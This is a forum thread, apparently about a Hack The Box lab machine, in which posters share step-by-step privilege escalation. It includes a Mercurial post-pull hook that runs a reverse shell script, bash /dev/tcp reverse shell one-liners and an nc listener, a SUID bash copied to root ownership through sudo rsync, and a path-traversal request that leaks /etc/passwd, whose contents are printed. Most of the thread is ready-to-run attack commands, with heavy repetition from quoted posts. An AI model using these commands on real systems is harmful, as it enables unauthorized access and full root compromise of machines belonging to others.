Posts: 43
Threads: 0
Joined: Sep 2024
10-06-2024, 04:10 AM
(This post was last modified: 10-06-2024, 04:25 AM by gfttjdb.)
(10-06-2024, 04:08 AM)hackemall Wrote: ROOT ROOT ROOT ROOT Check sudo privileges:
Perform the following steps to escalate privileges:
bash
cd /tmp; mkdir .hg; chmod 777 .hg; cp ~/.hgrc .hg/hgrc
Add the reverse shell script at the last line in /tmp/.hg/hgrc:
javascript
[hooks]
post-pull = /tmp/revshell.sh
Execute:
bash
chmod +x the revshell.sh
sudo -u dev /usr/bin/hg pull /home/dev/app-production/
Once you have dev privileges:
Command:
shell
$ cd /home/dev/
$ cp /bin/bash app-production/bash
$ chmod u+s app-production/bash
$ sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* --chown root:root /opt/app/
$ /opt/app/bash -p
You now have root access. u deserve reputation
(10-06-2024, 04:08 AM)hackemall Wrote: ROOT ROOT ROOT ROOT Check sudo privileges:
Perform the following steps to escalate privileges:
bash
cd /tmp; mkdir .hg; chmod 777 .hg; cp ~/.hgrc .hg/hgrc
Add the reverse shell script at the last line in /tmp/.hg/hgrc:
javascript
[hooks]
post-pull = /tmp/revshell.sh
Execute:
bash
chmod +x the revshell.sh
sudo -u dev /usr/bin/hg pull /home/dev/app-production/
Once you have dev privileges:
Command:
shell
$ cd /home/dev/
$ cp /bin/bash app-production/bash
$ chmod u+s app-production/bash
$ sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* --chown root:root /opt/app/
$ /opt/app/bash -p
You now have root access.
whats the inside of revshell.sh file ??
Ban reason: Asking for rep is not allowed | /Thread-Free-HTB-All-Active-Challanges-Flags (Permanent)
Posts: 63
Threads: 0
Joined: Aug 2024
echo "#!/bin/bash" > /tmp/revshell.sh
echo "/bin/bash -i >/dev/tcp/10.10.x.x./4444 0<&1 2>&1" >> /tmp/revshell.sh
chmod +x /tmp/revshell.sh
Posts: 63
Threads: 0
Joined: Aug 2024
set +H
echo "#!/bin/bash" > /tmp/revshell.sh
echo "/bin/bash -i >/dev/tcp/10.10..x.x/4444 0<&1 2>&1" >> /tmp/revshell.sh
chmod +x /tmp/revshell.sh
set -H
sudo -u dev /usr/bin/hg pull /home/dev/app-production/
Posts: 18
Threads: 0
Joined: Jul 2024
(10-06-2024, 04:10 AM)gfttjdb Wrote: (10-06-2024, 04:08 AM)hackemall Wrote: ROOT ROOT ROOT ROOT Check sudo privileges:
Perform the following steps to escalate privileges:
bash
cd /tmp; mkdir .hg; chmod 777 .hg; cp ~/.hgrc .hg/hgrc
Add the reverse shell script at the last line in /tmp/.hg/hgrc:
javascript
[hooks]
post-pull = /tmp/revshell.sh
Execute:
bash
chmod +x the revshell.sh
sudo -u dev /usr/bin/hg pull /home/dev/app-production/
Once you have dev privileges:
Command:
shell
$ cd /home/dev/
$ cp /bin/bash app-production/bash
$ chmod u+s app-production/bash
$ sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* --chown root:root /opt/app/
$ /opt/app/bash -p
You now have root access. u deserve reputation
(10-06-2024, 04:08 AM)hackemall Wrote: ROOT ROOT ROOT ROOT Check sudo privileges:
Perform the following steps to escalate privileges:
bash
cd /tmp; mkdir .hg; chmod 777 .hg; cp ~/.hgrc .hg/hgrc
Add the reverse shell script at the last line in /tmp/.hg/hgrc:
javascript
[hooks]
post-pull = /tmp/revshell.sh
Execute:
bash
chmod +x the revshell.sh
sudo -u dev /usr/bin/hg pull /home/dev/app-production/
Once you have dev privileges:
Command:
shell
$ cd /home/dev/
$ cp /bin/bash app-production/bash
$ chmod u+s app-production/bash
$ sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* --chown root:root /opt/app/
$ /opt/app/bash -p
You now have root access.
whats the inside of revshell.sh file ??
#!/bin/bash
bash -c "bash -i >& /dev/tcp/10.10.14.2/11111 0>&1"
bu your ip and port
Posts: 14
Threads: 2
Joined: Aug 2024
sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* --chown root:root /opt/app/
doing this asks for dev;s password, how do we get that?
Posts: 63
Threads: 0
Joined: Aug 2024
10-06-2024, 05:00 AM
(This post was last modified: 10-06-2024, 05:04 AM by hackemall.)
yes you got to get shell into dev first
this gets you to dev echo "#!/bin/bash" > /tmp/revshell.sh
echo "/bin/bash -i >/dev/tcp/10.10.x.x/4444 0<&1 2>&1" >> /tmp/revshell.sh
chmod +x /tmp/revshell.sh
nc -lvnp 4444
this is the trigger sudo -u dev /usr/bin/hg pull /home/dev/app-production/
Posts: 11
Threads: 0
Joined: Jun 2024
would like to learn more about this set of commands, any reference link?
Posts: 63
Threads: 0
Joined: Aug 2024
10-06-2024, 05:05 AM
(This post was last modified: 10-06-2024, 05:07 AM by hackemall.)
then thi makes you root cp /bin/bash /home/dev/app-production/bash
chmod u+s /home/dev/app-production/bash
sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* --chown root:root /opt/app/
/opt/app/bash -p
1. Initial Enumeration as qa User
When you were the qa user, you ran the sudo -l command, which revealed:
bash
User qa may run the following commands on localhost:
(dev : dev) /usr/bin/hg pull /home/dev/app-production/
This was a critical piece of information because it told you that the qa user could execute a Mercurial (hg) command as the dev user. This opened up the possibility to execute something malicious while posing as dev.
2. Understanding hg (Mercurial) Hooks
Mercurial is a version control system similar to Git. It allows you to automate actions with "hooks"—scripts that are triggered when certain actions (like a pull or commit) occur.
Knowing this, you could use a malicious hook to execute commands as the dev user whenever you performed a hg pull. This led to the idea of creating a reverse shell script in the hg configuration that would be executed when pulling from a repository.
Privilege Escalation from dev to root
After gaining a shell as dev, you checked the sudo -l privileges for dev and found that dev could run rsync with elevated privileges:
bash
sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* /opt/app/
The key here was the --chown flag, which allowed you to change the ownership of files being copied. You copied a SUID-enabled version of bash to /opt/app/, which would execute as root when run.
Posts: 33
Threads: 0
Joined: Mar 2024
(10-05-2024, 07:34 PM)Pepperwhite Wrote: We can leak /etc/passwd using the export function. Intercept response and forward export/../../../../../../etc/passwd and we get it.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
dhcpcd:x:100:65534:DHCP Client Daemon,,,:/usr/lib/dhcpcd:/bin/false
messagebus:x:101:102::/nonexistent:/usr/sbin/nologin
systemd-resolve:x:992:992:systemd Resolver:/:/usr/sbin/nologin
pollinate:x:102:1::/var/cache/pollinate:/bin/false
polkitd:x:991:991:User for polkitd:/:/usr/sbin/nologin
syslog:x:103:104::/nonexistent:/usr/sbin/nologin
uuidd:x:104:105::/run/uuidd:/usr/sbin/nologin
tcpdump:x:105:107::/nonexistent:/usr/sbin/nologin
tss:x:106:108:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:107:109::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:989:989:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin
usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
dev:x:1000:1000:dev:/home/dev:/bin/bash
mysql:x:110:110:MySQL Server,,,:/nonexistent:/bin/false
caddy:x:999:988:Caddy web server:/var/lib/caddy:/usr/sbin/nologin
postfix:x:111:112::/var/spool/postfix:/usr/sbin/nologin
qa:x:1001:1001::/home/qa:/bin/bash
_laurel:x:996:987::/var/log/laurel:/bin/false
im am bit confussed on this where to do and how to do
Posts: 39
Threads: 4
Joined: Sep 2024
How did you guys found the admindashboard, and from where did you get the script to get admin jwt toke. can you please explain it to me
|
